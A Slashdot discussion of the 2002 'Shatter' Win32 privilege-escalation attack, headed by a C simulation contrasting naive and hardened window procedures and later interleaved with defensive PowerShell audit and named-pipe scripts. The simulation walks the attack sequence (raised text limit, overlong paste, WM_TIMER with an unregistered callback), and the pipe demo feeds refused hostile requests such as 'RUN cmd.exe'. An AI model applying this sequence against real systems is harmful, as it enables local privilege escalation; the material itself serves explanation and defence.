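int naive_wndproc(struct window *w, unsigned msg, uintptr_t wparam, intptr_t lparam)
{
    timer_cb_t cb;
    switch (msg) {
    case EM_SETLIMITTEXT: w->limit = (size_t)wparam; return 0;
    case WM_PASTE:        do_paste(w, w->limit);    return 0;
    case WM_TIMER:
        cb = lparam ? (timer_cb_t)lparam : registered_cb(w, (unsigned)wparam);
        if (cb) cb((unsigned)wparam);
        return 0;
    }
    return -1;
}

/* Hardened pattern: a message carries no proof of its sender, so the receiver
 * validates it. A WM_TIMER callback runs only if it is the one registered for that
 * id (the check Windows later adopted); the paste is clamped to the app's own limit. */
int hardened_wndproc(struct window *w, unsigned msg, uintptr_t wparam, intptr_t lparam)
{
    timer_cb_t cb;
    switch (msg) {
    case EM_SETLIMITTEXT:
        if ((size_t)wparam > APP_MAX_INPUT) { w->dropped++; return -1; }
        w->limit = (size_t)wparam; return 0;
    case WM_PASTE: do_paste(w, APP_MAX_INPUT); return 0;
    case WM_TIMER:
        cb = registered_cb(w, (unsigned)wparam);
        if (lparam != 0 && (timer_cb_t)lparam != cb) { w->dropped++; return -1; }
        if (cb) cb((unsigned)wparam);
        return 0;
    }
    return -1;
}

/* Driver for the sequence the post walks through (raise the limit, paste, then
 * WM_TIMER with a callback address the app never set), against one handler. */
static int g_legit_calls, g_rogue_calls;
static void legit_cb(unsigned id) { (void)id; g_legit_calls++; }
static void rogue_cb(unsigned id) { (void)id; g_rogue_calls++; }
struct outcome { size_t pasted; int rogue_ran; int legit_ran; unsigned dropped; };
struct outcome run_model(wndproc_t proc)
{
    struct window w = {0};
    struct outcome o;
    w.limit = APP_MAX_INPUT;
    w.timers[0].id = 1; w.timers[0].cb = legit_cb; w.ntimers = 1;  /* app's own SetTimer */
    g_legit_calls = g_rogue_calls = 0;
    g_clipboard = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";   /* 32 bytes, twice what the app expects */
    proc(&w, EM_SETLIMITTEXT, 0xFFFFFFFFu, 0);
    proc(&w, WM_PASTE, 0, 0);
    proc(&w, WM_TIMER, 1, (intptr_t)rogue_cb);          /* address the app never registered */
    proc(&w, WM_TIMER, 1, 0);                           /* a genuine timer tick */
    o.pasted = strlen(w.text); o.rogue_ran = g_rogue_calls; o.legit_ran = g_legit_calls; o.dropped = w.dropped;
    return o;
}
```

Run against naive_wndproc the model pastes all 32 bytes and calls the unregistered callback; against hardened_wndproc it keeps 16 bytes, refuses both the limit change and the foreign callback, and still fires the app's own timer.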

Re:Article text in case of /. effect (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020602)

The article is straight text, no images, off a good connection. Please moderators, for once do your job and mod these down as redundant.

Scott Charney (1, Informative)

Oliver Newland (596957) | more than 11 years ago | (#4020558)

I went to University of Michigan with Scott Charney and he's a really cool guy. A little background info [umich.edu] is in order here. I really hope that he improves the Microsoft security record, and I really think he's enough of a go-getter to do just that.

This is not new (1, Insightful)

Anonymous Coward | more than 11 years ago | (#4020559)

This class of attack is not new, it has been discussed before. While you can assert that the blame lies with Microsoft (and I'll admit they do have some responsibility to address the problem you describe) the chief blame lies with the vendor of the software whose bad programming you are exploiting. There is no excuse to put a window for a process with the LocalSystem security context on a user's desktop. I am not aware of any Microsoft application that makes such a mistake.

Re:This is not new (1, Informative)

Anonymous Coward | more than 11 years ago | (#4020652)

This is very true. Had they been following the guidelines for proper Win32 application development this would not be an issue. In this case, they should have decoupled the GUI control interface from the service/daemon that must run as LocalSystem and used a secure interprocess communication mechanism.

It's really no different than if I bang out an exploitable daemon that has to run as root under Linux.

unfixable? (0)

Anonymous Coward | more than 11 years ago | (#4020569)

How is it unfixable? Is it unfixable in the way that many current applications rely on this feature?

here we go (-1, Troll)

tps12 (105590) | more than 11 years ago | (#4020573)

Well, what can I say to this? We've all suspected that poor design could finally bite Micro$oft for real. And now here it is. The unpatchable security hole.

I think this is the end of Windows.

What can they do? Where can they go? Even if M$ could take all of its employees off the Office, X-Box, and every other project, and put them to work on a new OS, it would be months before it could be released, and more months before there were any applications for it. By that time, most or all of the existing Windows base will have been compromised.

It's kind of unfortunate that Linux will win, not based on its (considerable) technical merits, but because of a Windows design flaw. But in the end, all computer users will be better off, so I can't complain. Welcome to the world without Windows.

Re:here we go (1, Troll)

turbine216 (458014) | more than 11 years ago | (#4020632)

The END of WINDOWS? Christ, could you pack just a little more apocalyptic FUD into that statement?

This "exploit" is hardly even an exploit - it requires the ability to run arbitrary code. And if just anybody can acquire the ability to run arbitrary code, then i would say the problem runs a bit deeper than msgsvr32.dll.

Here's something to chew on, zealot: use this exploit on my win2k server. I dare you. What? You can't get in? Oh, you mean the BASIC SECURITY FEATURES BUILT INTO THE OPERATING SYSTEM HAVE THWARTED THIS EXPLOIT BEFORE IT COULD EVEN GET OFF THE GROUND? That's what I thought.

Christ, your drivel is actually making me sick. Do you actually believe what you just wrote?

Re:here we go (1, Offtopic)

laserjet (170008) | more than 11 years ago | (#4020681)

Does your mouth hurt? You just got trolled.

Re:here we go (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020720)

nah...look at his previous posts. This guy's not smart enough to be a troll. He's great at being an idiot, though.

Re:here we go (1)

joshsisk (161347) | more than 11 years ago | (#4020639)

I'll bet you $100 that this is not the "end of Windows". Seriously.

I'd be happy to lose this bet... But I doubt I will.

Re:here we go (1)

Helter (593482) | more than 11 years ago | (#4020699)

Windows 98 allowed any user with console access to operate as root for years... Now you think an obscure exploit that has been around for over 10 years is going to cause the downfall of windows?

Excuse my extreme skepticism.

Re:here we go (2)

Rick the Red (307103) | more than 11 years ago | (#4020708)

Even if M$ could take all of its employees off the Office, X-Box, and every other project, and put them to work on a new OS, it would be months before it could be released, and more months before there were any applications for it.
Microsoft isn't stupid. Even they know the best way to kill a project is to put too many people on it. The solution to your supposed problem (it's not as bad as everyone here hopes, and does not require Microsoft to write a new OS from scratch) would be to put together a cross-functional team to develop a new OS architecture, then spec the new APIs for that new OS. Then you bring in the Office guys, and have them write a version of Office for the new APIs, while you have the Windows guys (or whoever) write the new OS. But it'll never happen, because there's no need to do it.

Microsoft has had 7 years of warning. (2, Offtopic)

Quasar1999 (520073) | more than 11 years ago | (#4020574)

Microsoft was told about this flaw when it was first discovered 7 years ago. They still haven't fixed it.

In other news, Microsoft is suing CNET for making a flaw public news. They claim they needed more time to fix it, 7 years just isn't enough time to fix the bug and test the patch...

Is this really a security risk? (0, Troll)

turbine216 (458014) | more than 11 years ago | (#4020577)

This whole exploit seems flawed in its assumptions...I mean, how can it be classified as a security risk of ANY sort if it requires that someone is sitting in front of the computer? It seems like this is something that could easily (EASILY) be avoided by - wait for it - preventing unauthorized access! Something that Windows has been doing pretty well since Windows 2000 (flame on, zealots, but it's true).

Sounds like this guy is just trying to gain cool-guy points with the slashbot crowd by showing off his 1337 windoze hacking skillz. Pass.

Re:Is this really a security risk? (2)

Marx_Mrvelous (532372) | more than 11 years ago | (#4020621)

This is a huge risk. As any security administrator knows, more security breaches come from within a computer network than from without. Even if computers are locked in a computer room, what about the desktop machines? We currently use profiles to prevent people from installing unlicensed software. But with this exploit, that probably would not be very hard. This is a huge problem in Windows.

Re:Is this really a security risk? (1)

turbine216 (458014) | more than 11 years ago | (#4020676)

A user's ability to crash his or her desktop machine does NOT constitute a HUGE risk, as you put it (especially when considering that it requires binary/hex editors and various other obscure tools that your typical user just doesn't have).

And any competent netadmin/sysadmin will make sure that those same users don't have the ability to run arbitrary code on a server.

I agree that this is a serious flaw in MS's design, but christ, aren't you blowing it just a BIT out of proportion? Seriously...can you think of a single situation where this would ACTUALLY create a real security risk?

Re:Is this really a security risk? (1)

Ardax (46430) | more than 11 years ago | (#4020716)

Policies? I remember a handy little program that would reset a system's policies and prevent them from being pulled from the server at next boot.

I've probably still got it sitting on my hard drive somewhere. I don't know if this will still work on XP, or even 2k. Should I ever get the opportunity again, I might check. :)

Re:Is this really a security risk? (1)

jasonrfink (193522) | more than 11 years ago | (#4020646)

Terminal access and shared access to a server can be used to perform the same attack on a server from a client. If the Shatter attack is as easy as he makes it out to be, practically anyone could do it within the company fence, for those who install ms on the wire I am not sure what attacks could be performed. If a system on the wire has shares activated or terminal services running, it is only a matter of time before they can use this attack.

Re:Is this really a security risk? (5, Insightful)

topham (32406) | more than 11 years ago | (#4020648)

A user opens a damn attachment, which you've told them not to do a hundred times, but one of them does it anyway...

No problem right, the attachment runs as that user and the damage is restricted? Only it isn't, because the attachment escalates itself to localsystem privilege and now starts really screwing around.

With any luck it drops itself on the network somewhere and some other soul mistakenly runs it and it gets domain privileges...

Re:Is this really a security risk? (0)

Anonymous Coward | more than 11 years ago | (#4020659)

Did you read the fuckin article you troll?? He said he did it to a remote computer from far away. You just need access to the computer, not physical access, but a user account on the computer. Like he says at the end, this could be really bad for large corporations of people. Or any place that lets employees connect from home. Just a friendly reminder to read the linked article before you post. fuckin douche handle

Re:Is this really a security risk? (2)

sysadmn (29788) | more than 11 years ago | (#4020666)

Read the article. This is an escalation-of-privileges attack. Very few businesses give every user 'root' on their desktop. Now Microsoft has done it for them.

Re:Is this really a security risk? (1)

RetroGeek (206522) | more than 11 years ago | (#4020674)

Scenario:

- I am a user on a corporate machine. I have very basic access to the machine, ie: I cannot install s/w that requires admin access.

- I install a utility that does not require admin access.

- The utility runs, but in the background raises MY access to 'local System' (read root), using this exploit.

- Now that utility can do anything it wants.

It's the equivalent of a Linux user gaining root access simply by running an app.

Re:Is this really a security risk? (2)

Slynkie (18861) | more than 11 years ago | (#4020675)

The fact that it may require an attacker to be physically in front of the computer is the -point-. As others have mentioned, it's a matter of being assigned a certain (low) level of access, and giving yourself a higher level. Sort of equivalent to a local root exploit under un*x.

Think of the "Family Computer". Mom + dad put some content blocking software on it in order to block their son/daughter from accessing some particular type of content on the web. Mom + dad also install, to use the example from the white paper, anti-virus software.

Little Billy logs in as himself, uses the shatter exploit to give himself admin privileges, and disables the content blocker.

At least, that's the way I understood it...

(btw, if it was me 15 years ago, I'd probably lock out mom + dad's accounts just for kicks, but that's beside the point.)

Re:Is this really a security risk? (1)

Ardax (46430) | more than 11 years ago | (#4020689)

It doesn't really require someone to be sitting at the console.

Socially engineer yourself a login and hijack the machine remotely via Terminal Services (or Remote Desktop Connection, which is ENABLED by default in XP). Owie.

Yes, clueful sysadmins or netadmins will make sure that port 3389 (IIRC) is firewalled, but there are lots of admins that are either not clueful or overridden by a PHB.

Don't believe me? Check with a sysadmin running a web server. Ask them how many Code Red or Nimda hits they still get per hour.

Re:Is this really a security risk? (0)

Anonymous Coward | more than 11 years ago | (#4020703)

just about every day, i see hundreds of students sitting in front of my university's Win2000 network in the student computer labs... it's kinda hard to limit the authorized access...

think harder next time, the whole world doesn't revolve around your setup...;)

Re:Is this really a security risk? (0)

Anonymous Coward | more than 11 years ago | (#4020715)

The main security hole IMO is that programs can be written to simulate users for other applications. For example, I once used a program which had thousands of phone numbers stored in its encrypted databases. The program would only allow 50 or so numbers pulled at a time through a fairly tedious process (so that people couldn't simply rip the database off of the CD). By writing a program to automate this process (which is a trivial exercise to do in Windows), the entire database could be copied painlessly, thereby defeating their simple security protection.

Re:Is this really a security risk? (2)

Abcd1234 (188840) | more than 11 years ago | (#4020723)

Bull. Local exploits are just as important to avoid as remote ones. Anyone who thinks otherwise has their head in the sand. Ignoring the proliferation of remote exploits on the Windows platform, the fact is, people want to run multiuser systems on Windows-based networks (why do you think Microsoft rolled TS into their main product line? To promote this very thing!) And the minute you start allowing multiuser access like this, local exploits become a real concern. Imagine you're running a University using TS and a bunch of thin clients, and you happen to have a cracker enrolled in your program? The point is, in this sort of environment, you CAN'T trust the user, and so you can't take the chance that a local exploit could leave you vulnerable.

Hmm that gives me an idea... (1)

jsonmez (544764) | more than 11 years ago | (#4020579)

That means I essentially could write a version of Paint that, when you open it, closes all other windows you have open on your system and flashes up a window that says "PAY YOUR ALLEGIANCE TO PAINT ALONE!"

Fixability (4, Interesting)

Wrexen (151642) | more than 11 years ago | (#4020580)

What's to prevent an administrator from installing a Message Hook [microsoft.com] that eats all EN_* or WM_TIMER messages sent between processes? Since your DLL would be living in each process space, you could detect inter-process message sending and block the attack from ever leaving the Shatter process. I don't see any reason why this shouldn't work

Re:Fixability (4, Insightful)

erasmus_ (119185) | more than 11 years ago | (#4020663)

Finally, a constructive response to the problem. However, since you still don't have the capability of seeing what the source of the message is, I don't see how you can drop all of those messages with 100% certainty. Those API calls are there and are used legitimately as well, for better or for worse. So although your way could fix things, I wouldn't be surprised to see it breaking some applications along with it.

Re:Fixability (1)

hyperstation (185147) | more than 11 years ago | (#4020718)

cut and paste wouldn't be very useful then, would it? i don't know much about win32 api, just assuming here...

SD3, eh? Sounds suspicious. (2)

mbourgon (186257) | more than 11 years ago | (#4020587)

[Scott Charney, Microsoft]
We're doing this thing called "Trustworthy Computing." It's an evolving concept. We've come up with our new paradigm, SD3[...]

A-ha! It's just a small leap to go from SD-3 to SD-6. Insert joke about covert evil organizations here.

Yes, it's funny. Laugh.

9/11 related Easter Egg on orbitz.com (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020588)

OMG!! Go to Orbitz.com [orbitz.com] and use their OrBot to book a flight from BOS to LAX on 9/11.

Re:9/11 related Easter Egg on orbitz.com (0)

Anonymous Coward | more than 11 years ago | (#4020695)

hmm. where? i don't see it.

Read the BugTraq replies first (4, Informative)

pbemfun (265334) | more than 11 years ago | (#4020589)

Before jumping to conclusions, read the reply to the "vulnerabilities" on the BugTraq mailing list here [securityfocus.com] . Doesn't look like it's something unknown to the public, and it's really more of a vendor problem, not an MS one.

Devil's Advocate... (2, Interesting)

d_force (249909) | more than 11 years ago | (#4020590)

It seems this exploit allows local users to escalate their privileges through processes running as LocalSystem. So, I could either do this or open up the system, take out the hard drive, re-write the OS, and put the drive back in the system. Yes, these problems do exist when you're forced to trust local users.

Simple fix: require each user to wear a straightjacket with their legs and arms bound to the chair; have them type via the mouth-to-pencil-to-keyboard method.

Re:Devil's Advocate... (0)

Anonymous Coward | more than 11 years ago | (#4020624)

But with Windows's Remote Desktop, anyone can be a local user.

Re:Devil's Advocate... (2, Insightful)

Algorithm wrangler (455855) | more than 11 years ago | (#4020671)

But as long as M$ allows E-Mail clients and even Media Players to execute random code at will, the "local user" is a matter of definition.

Re:Devil's Advocate... (1)

mark_lybarger (199098) | more than 11 years ago | (#4020683)

there's a reason you don't allow normal users to have administrator (root) access. among the many others, you just don't want them to fsck up the system beyond unbelief.

on a side note, why do you need to remove the drive to write an os to it???

Don't Do That (3, Insightful)

cperciva (102828) | more than 11 years ago | (#4020593)

This "vulnerability" only affects poorly-written applications, running with system privileges, which create windows in user-space.

You're not supposed to do that.

If you want to have a service which is user-configurable, create two separate programs (one service & one gui) and communicate via a named pipe.

This isn't a flaw in the win32 API. This is a flaw in some applications which run under windows.
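The two preconditions this comment describes (a service running as LocalSystem, and a window it has put on the user's desktop) can be inventoried on a machine before anyone argues about whose fault it is. The PowerShell below is an added example, not code from the paper, from Microsoft or from any poster in this thread. It assumes Windows PowerShell 5.1 running as an ordinary user; the `ShatterAudit` namespace, the function names and the treatment of processes whose owner cannot be read are my own choices. The `Win32_Service.DesktopInteract` property and the `user32.dll` calls are real; everything else is scaffolding for the check.

```powershell
# Added example (not from the paper or the thread): list what a Shatter-style attack needs
# on this box: (1) services flagged to interact with the desktop, and (2) visible top-level
# windows whose owning process runs as a different account than the one running this script.
# Assumption: run in Windows PowerShell 5.1 as a normal user. On Vista and later, services
# live in session 0, so (2) mostly surfaces elevated processes in your own session instead.

Add-Type -Namespace ShatterAudit -Name User32 -MemberDefinition @'
public delegate bool EnumWindowsProc(IntPtr hWnd, IntPtr lParam);
[DllImport("user32.dll")] public static extern bool EnumWindows(EnumWindowsProc lpEnumFunc, IntPtr lParam);
[DllImport("user32.dll")] public static extern bool IsWindowVisible(IntPtr hWnd);
[DllImport("user32.dll")] public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll", CharSet = CharSet.Unicode)]
public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder lpString, int nMaxCount);
'@

function Get-InteractiveService {
    # Win32_Service.DesktopInteract mirrors the SERVICE_INTERACTIVE_PROCESS flag (0x100 in the
    # service's Type value). A service with this set and StartName LocalSystem is the textbook target.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.DesktopInteract } |
        Select-Object Name, StartName, State, PathName
}

function Get-ProcessOwner([uint32]$ProcessId) {
    $p = Get-CimInstance -ClassName Win32_Process -Filter "ProcessId = $ProcessId"
    if (-not $p) { return 'exited' }
    $o = Invoke-CimMethod -InputObject $p -MethodName GetOwner
    # A normal user cannot open SYSTEM's processes; WMI then returns a non-zero code.
    # That is reported as 'unreadable' rather than silently skipped, because it almost
    # always means "not your account", which is exactly the case of interest here.
    if ($o.ReturnValue -ne 0) { return 'unreadable' }
    return "$($o.Domain)\$($o.User)"
}

function Get-ForeignWindow {
    $me    = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $found = New-Object System.Collections.Generic.List[object]
    $cb = [ShatterAudit.User32+EnumWindowsProc]{
        param([IntPtr]$hWnd, [IntPtr]$lParam)
        if ([ShatterAudit.User32]::IsWindowVisible($hWnd)) {
            [uint32]$procId = 0
            [void][ShatterAudit.User32]::GetWindowThreadProcessId($hWnd, [ref]$procId)
            $sb = New-Object System.Text.StringBuilder 256
            [void][ShatterAudit.User32]::GetWindowText($hWnd, $sb, $sb.Capacity)
            $found.Add([pscustomobject]@{ Handle = $hWnd; ProcessId = $procId; Title = $sb.ToString() })
        }
        return $true   # keep enumerating
    }
    [void][ShatterAudit.User32]::EnumWindows($cb, [IntPtr]::Zero)

    # One owner lookup per process, then report every window of a process that is not "me".
    $found | Group-Object ProcessId | ForEach-Object {
        $owner = Get-ProcessOwner ([uint32]$_.Name)
        if ($owner -ne $me) {
            foreach ($w in $_.Group) {
                [pscustomobject]@{ ProcessId = $w.ProcessId; Owner = $owner; Title = $w.Title }
            }
        }
    }
}

"== Services allowed to interact with the desktop =="
Get-InteractiveService | Format-Table -AutoSize
"== Visible windows not owned by $([Environment]::UserName) =="
Get-ForeignWindow | Format-Table -AutoSize
```

Anything in the second table that also appears in the first is a window a LocalSystem process has placed inside the user's message-passing reach, which is the configuration the paper's example application had. Child controls (edit boxes and the like) are not listed, since `EnumWindows` walks only top-level windows; an `EnumChildWindows` pass over each hit would extend the inventory to them.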

Re:Don't Do That (0)

Anonymous Coward | more than 11 years ago | (#4020710)

What's really funny is that this is the best comment I've seen, and someone modded it "overrated".

What about *other* resources? (2)

Tablizer (95088) | more than 11 years ago | (#4020594)

GUI Windows are only part of the problem. Ideally, one should be able to limit the sections of disk and RAM that are used, and also how much disk and RAM are used.

Why fuss about just the GUI? There is more to applications and security than GUI's.

(It would be easier to clean off old apps if we could limit their installation range.)

No kidding (0)

Anonymous Coward | more than 11 years ago | (#4020605)

With the gettext, sendmessage, memory and various other api calls you can do just about anything to other programs.

Then if you care to fire up your favorite hex editor...

Java? (0)

Anonymous Coward | more than 11 years ago | (#4020616)

i looked at the paper and i couldn't figure out what the opportunity for remote exploit is... can it be done from java? .NET? jscript? other network software?

Could be useful for the EverQuest-autobot crowd... (0)

Anonymous Coward | more than 11 years ago | (#4020617)

Seems like it could be useful for the autobot gaming crowd... EverQuest is certainly simple enough to automate...

Evolving Concepts at Microsoft are Frightening (5, Funny)

guttentag (313541) | more than 11 years ago | (#4020637)

We're doing this thing called "Trustworthy Computing." It's an evolving concept.
It starts out meaning "We are worthy of your trust."

Then it evolves to mean "You trust us."

Then it evolves to mean "You trust only us."

Then it evolves to mean "All your base are belong to us."

Shouldn't Affect Network Security (1)

zapf (119998) | more than 11 years ago | (#4020638)

No one should be allowed console access to a server, and localsystem can't be used (unless there's another exploit) to take over other computers on a domain. Granted, someone could mess up a public computer at a library or whatever, but they couldn't mess up win32 boxes en masse because they don't have escalated network privileges, just local system ones.
Also, most individual users log into their computers as Administrator and thus make themselves vulnerable to viruses anyway. Even with corporate spying this wouldn't be a very effective exploit. Company A sends a trojan to a designer at Company B. The trojan would run as the designer, who has access to all of his files anyway. There's no need to escalate privileges on the local machine!

Anyway, I'm not trying to say it's not a flaw. It is. It's just not the Computer Apocalypse.

There are advantages... (3, Interesting)

FortKnox (169099) | more than 11 years ago | (#4020657)

Having a message hook has a great advantage as a side effect.
You can make a program that can take any window on your screen, study it, and use it. Imagine the testing possibilities. I think WinRunner and Rational Robot both use message hooks in order to run their regression testing utilities.

Is there anything like that in linux? AskSlashdot [slashdot.org] encountered someone trying to find this...

the basic problem (3, Interesting)

jafac (1449) | more than 11 years ago | (#4020661)

Okay, here's the problem, spotted it in like the first response of the CNET article:

Q: I understand security was not your original calling, so to speak.

A: I'm a lawyer by training, so I'm a little bit like a fish out of water, although I'm more technical than most lawyers. I started my career as a prosecutor in Bronx County, New York. Then I joined the feds and went to Honolulu for three years. So, I haven't exactly had the normal career path. But it's been a very interesting ride.

So what exactly qualifies this guy to be a security guru, let alone THE HEAD of security at the software company that sells the most widely used OS on the planet?

If you ask me, I find that frightening.

I've said it here before a zillion times over the years and I'll say it again. Nearly every problem in the software industry today can be traced back to handing over an engineer's job to a non-engineer.

True: if you take a company of nothing but engineers, you'll have a product nobody understands how to use, and nobody can sell. But if you have a company of nothing but MBAs and lawyers, you have a company that sells nothing but a lot of vapor and hype. This is the personification of Microsoft.

As a side note (0)

Anonymous Coward | more than 11 years ago | (#4020664)

If you have local access to any box running a third party app that requires local root privileges, and it allows the local user to pass code to it, you can get root.

The CNET article also amusing...lawyers... (0)

Anonymous Coward | more than 11 years ago | (#4020668)

Hmm...the idea of a lawyer being "promoted" into a security expert sounds like they will use "security" through the legal system rather than actually fixing things...

Solaris x86 (1)

ccoder (468480) | more than 11 years ago | (#4020669)

Too bad Sun Microsystems stopped developing the x86 version of Solaris.... (not that it is widely used). Maybe this will convince more software developers like PeopleSoft, Oracle, etc. to KEEP developing code on other SECURE platforms, not ones that just claim to be.

Microsoft's Reply (1)

mgibbs (548224) | more than 11 years ago | (#4020677)

...seems like a fair assessment of the situation.

If someone is running arbitrary programs on my Windows machine, I'm probably not going to be as worried about privilege escalation as I am about someone running arbitrary programs on my Windows machine.

Microsoft's reply can be found here: http://security.tombom.co.uk/response.txt [tombom.co.uk] .

--Matt

SlashSnot (0)

Anonymous Coward | more than 11 years ago | (#4020679)

MicroSnot Winbloze has insecure code, i seen it, the code is made full of holes put there on purpose to give it more compatibility between applications thats why its "so easy to use no wonder its number 1" (the AOL of OSs)

if you seen what i seen you would abandon it like a smelly whore it is...

Local access...?? (0)

Anonymous Coward | more than 11 years ago | (#4020680)

When Microsoft saw a copy of this paper, they sent me a response stating clearly that they are aware of these attacks, and they do not class them as vulnerabilities. I believe that this point of view is incorrect. The two reasons that Microsoft stated are that a) They require unrestricted physical access to your computer, or b) they require you to run some kind of malicious code on your machine.

Um, great.

I've never coded for win32, only MacOS and UNIX, but I have a few questions.
  • What about Terminal Server? The implication here seems to be that if you allow anyone to access your machine via terminal server, any security restrictions you've set on them are voluntary from their standpoint.
  • The trick seems to involve the win32 APIs, and tricking other win32 programs with higher privileges into executing unprivileged code. Must, though, the program be GUI or graphically launched in order to use this exploit? Specifically, can it be CLI? Can it be a local program, for example default.ida, that has been compromised?
  • I thought Win2000 has protected memory? Shouldn't that halt at least some of this? No?
  • Doesn't the NSA demand at least a certain level of security separation within their OS, like, they demand that if one program is compromised the others can't be touched even if they're being run by the same user? Thus this "SecureLinux" stuff. Doesn't this all mean the NSA can't use NT now?
I keep thinking I've misunderstood this somehow. That Microsoft is claiming it isn't a problem that the security separations within the OS don't apply as long as you can run an application... that just seems completely unreal. Am I to understand that any program can get code to execute as Administrator? I must be misunderstanding this, somehow. I can't imagine even they could get away with something like that. I remember what a fiasco and embarrassment it was for the linux community a while back when the linux kernel was found to have that privilege escalation bug; the linux developers seemed to treat that like the end of the world. And MS seems to think that the same thing is not a concern because "you have to have physical access"?? Yeah, physical access usually equals root anyway, but haven't these people ever heard of a school computer lab?? Or a public library??

BTW, there's another good discussion on this subject currently working its way through the kuro5hin edit queue, if you wanna pop over there and check on it.

window messages a privilege boundary? (5, Informative)

weld (4477) | more than 11 years ago | (#4020682)

Where is it documented that windows provides a privilege boundary at the message interface? There is none. The example application was poorly designed.

An application that needs to provide a window interface to the user should do so through another process running as the user and not system. That process should then communicate to the higher privileged process using a mechanism such as COM or named pipes.

A similar problem was found by Dildog quite a while ago, "NetDDE Message Vulnerability":
http://www.atstake.com/research/advisories/2001/a020501-1.txt

The method of exploit described in Shatter is new: putting shellcode into memory through edit controls and then using timer messages. But the fundamental problem is not a new class of problem. It is with the application's design, not Windows.

-weld
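Both this comment and cperciva's "Don't Do That" above prescribe the same fix: keep the privileged code in a windowless process and let a separate, user-privileged GUI talk to it over a named pipe. The script below is an added example of that split, written for this page; it is not code from the paper, from @stake or from any poster. Both halves run in one ordinary-user Windows PowerShell 5.1 session so the exchange can be watched end to end; in a real deployment the server half is the LocalSystem service. The pipe name, the two settings and the `SET key=value` grammar are my own choices for the demo; the .NET pipe and ACL classes are real.

```powershell
# Added example (not from the paper or the thread): a privileged "service side" that owns a
# named pipe with an explicit DACL and a closed command grammar, and an unprivileged "GUI side"
# that can only ask for things the service already knows how to refuse.
# Assumption: Windows PowerShell 5.1 (.NET Framework), run as a normal user.

Add-Type -AssemblyName System.Core          # System.IO.Pipes on .NET Framework
$pipeName = 'ShatterDemo-Config'            # demo name, not anything the paper uses

# --- service side: build the pipe ACL before the pipe exists ----------------------------
# Authenticated local users get read/write; only the creating account gets full control.
# (A pipe message carries bytes. A window message could carry a callback address: that is the
#  difference the two comments above are pointing at.)
$sec       = [System.IO.Pipes.PipeSecurity]::new()
$authUsers = [System.Security.Principal.SecurityIdentifier]::new(
                 [System.Security.Principal.WellKnownSidType]::AuthenticatedUserSid, $null)
$sec.AddAccessRule([System.IO.Pipes.PipeAccessRule]::new(
    $authUsers, [System.IO.Pipes.PipeAccessRights]::ReadWrite,
    [System.Security.AccessControl.AccessControlType]::Allow))
$owner = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
$sec.AddAccessRule([System.IO.Pipes.PipeAccessRule]::new(
    $owner, [System.IO.Pipes.PipeAccessRights]::FullControl,
    [System.Security.AccessControl.AccessControlType]::Allow))

$server = [System.IO.Pipes.NamedPipeServerStream]::new(
    $pipeName, [System.IO.Pipes.PipeDirection]::InOut, 1,
    [System.IO.Pipes.PipeTransmissionMode]::Byte, [System.IO.Pipes.PipeOptions]::None,
    4096, 4096, $sec)

# The service accepts exactly two settings with fixed value sets. Nothing in the request is
# ever dereferenced, executed or used as a path; anything outside the grammar is refused.
$allowed = @{ 'scan_on_access' = @('on', 'off'); 'log_level' = @('quiet', 'normal', 'verbose') }
function Invoke-ConfigRequest([string]$line, [string]$caller) {
    if ($line -notmatch '^SET ([a-z_]{1,20})=([a-z]{1,10})$') { return "ERR malformed request from $caller" }
    $key, $val = $Matches[1], $Matches[2]
    if (-not $allowed.ContainsKey($key))  { return "ERR unknown setting '$key'" }
    if ($allowed[$key] -notcontains $val) { return "ERR value '$val' not permitted for '$key'" }
    return "OK $key=$val (requested by $caller)"
}

# --- GUI side: an ordinary client; here it lives in the same script ------------------------
$client  = [System.IO.Pipes.NamedPipeClientStream]::new('.', $pipeName, [System.IO.Pipes.PipeDirection]::InOut)
$pending = $server.BeginWaitForConnection($null, $null)
$client.Connect(3000)
$server.EndWaitForConnection($pending)

$toServer   = [System.IO.StreamWriter]::new($client); $toServer.AutoFlush = $true
$fromClient = [System.IO.StreamReader]::new($server)
$toClient   = [System.IO.StreamWriter]::new($server); $toClient.AutoFlush = $true
$fromServer = [System.IO.StreamReader]::new($client)

# Two legitimate requests, then two that a Shatter-style client might try through a text field.
foreach ($req in 'SET log_level=verbose', 'SET scan_on_access=off',
                 'SET log_level=C:\evil.dll', 'RUN cmd.exe') {
    $toServer.WriteLine($req)
    $line = $fromClient.ReadLine()
    # The service learns who is asking from the pipe itself, never from the request text.
    $reply = Invoke-ConfigRequest $line $server.GetImpersonationUserName()
    $toClient.WriteLine($reply)
    '{0,-28} -> {1}' -f $req, $fromServer.ReadLine()
}
$client.Dispose(); $server.Dispose()
```

Two things to notice when reading it against the Shatter write-up. The identity used for authorization comes from `GetImpersonationUserName()` on the server end of the pipe, so the GUI cannot claim to be someone else the way a window message can come from anyone on the desktop; and the only thing the privileged side ever does with untrusted input is match it against a regular expression and a fixed table, which is why the last two requests are refused before anything is interpreted. The pipe is also created with `PipeOptions::None` rather than a remote-capable configuration, so the earlier comments about Terminal Services and shares do not turn it into a network listener by accident.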

NetCafs surrender... (0)

Anonymous Coward | more than 11 years ago | (#4020686)

Meanwhile, does OS X have the same problem?

sandboxes, java native api, .net, etc...? (0)

Anonymous Coward | more than 11 years ago | (#4020690)

I wonder, since this is an api exploit, if one can use it from a java or c# applet by calling win32 api native methods?

At the end of the article... (2)

Spackler (223562) | more than 11 years ago | (#4020697)

This is a good thing because it can eliminate a lot of viruses. So if you get code and it's not from anyone you trust, you can choose to not run it.

So, can I take this to mean that windows has finally added chmod?

Do you people read? (3, Insightful)

Ryan_Terry (444764) | more than 11 years ago | (#4020705)

--Flamebait--

I'm sorry, and I hate to be a stickler, but did you people even read part of the article?

The e-mail he received outlines where the danger lies, and also outlines the fact that this is not necessarily an MS problem but a vendor-related issue. I am very pro-linux, and I will support it till I die, but this blatant MS bashing makes linux users look like morons.

Just for once I wish people would read the articles before the "M$ Sux0rs, I will 0wne any M$ Boxen" gibberish begins...

two points (2)

Lord Omlette (124579) | more than 11 years ago | (#4020721)

